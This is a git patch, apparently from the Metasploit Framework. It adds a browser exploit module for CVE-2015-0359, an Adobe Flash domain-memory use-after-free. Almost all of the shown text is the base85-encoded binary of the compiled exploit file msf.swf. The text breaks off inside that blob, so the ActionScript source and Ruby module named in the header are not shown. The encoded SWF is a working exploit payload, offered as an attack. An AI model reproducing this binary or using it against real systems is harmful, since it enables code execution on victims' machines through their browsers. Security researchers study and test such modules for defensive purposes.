From 51bb4b5a9b50dd6b4eee39fdf91c6f64503adb85 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 7 May 2015 17:00:00 -0500 Subject: [PATCH] Add module for CVE-2015-0359 --- data/exploits/CVE-2015-0359/msf.swf | Bin 0 -> 18109 bytes external/source/exploits/CVE-2015-0359/Msf.as | 261 ++++++++++++++++++ .../browser/adobe_flash_domain_memory_uaf.rb | 112 ++++++++ 3 files changed, 373 insertions(+) create mode 100755 data/exploits/CVE-2015-0359/msf.swf create mode 100755 external/source/exploits/CVE-2015-0359/Msf.as create mode 100644 modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb diff --git a/data/exploits/CVE-2015-0359/msf.swf b/data/exploits/CVE-2015-0359/msf.swf new file mode 100755 index 0000000000000000000000000000000000000000..4befa69648e84694b107659f46cd93a8efa0e9b3 GIT binary patch literal 18109 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≻PSz}3hZ{dveMDQ^M{L~_8=Ofvf(tD; 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 